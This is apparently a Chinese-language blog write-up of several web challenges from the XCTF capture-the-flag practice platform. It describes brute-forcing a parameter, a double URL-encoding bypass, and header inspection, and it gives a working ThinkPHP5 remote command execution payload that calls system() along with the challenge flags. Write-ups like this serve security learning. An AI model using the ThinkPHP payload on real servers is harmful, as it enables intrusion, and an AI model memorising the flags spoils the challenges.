攻防世界web进阶区 攻略

前言:

web进阶区题目相对于新手区较难,此博客只是记录了一些比较重要或者
有代表性的题目,比较难的题暂时不会解,以后还会有补充。

1.isc-06

这道题用到了对id参数进行爆破。进入题目后看到url后存在参数id,使用各种注入方式后均没有爆破成功,最后使用bp对id参数进行爆破
在这里插入图片描述
进入报表中心,看到url
在这里插入图片描述
用bp爆破id,id=2334时有变化,查看response,找到flag。
在这里插入图片描述

2.php2

题目提示进入index.php页面,查看源代码,
在这里插入图片描述
大意就是id进行 urldecode()后等于 admin,由于浏览器会自动 进行一次解码,所以需要进行两次加密

第一次:%61%64%6d%69%6e
第二次:%2561%2564%256d%2569%256e
payload: ?id=%2561%2564%256d%2569%256e

cyberpeace{08408ed7908adc72cc8b92ad9d7cc31e}

3.baby_web

题目直接就提示了初始页面,那么直接江url改为index.php,然后就自动跳转到1.php,然后使用burp suite抓index.php的包,在请求头看到了flag
flag{very_baby_web}

4.php-rce

这道题用到了thinkphp5 远程命令执行漏洞,具体内容可以百度
这个是payload:
?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(“cat%20…/…/…/flag”);%27

flag{thinkphp5_rce}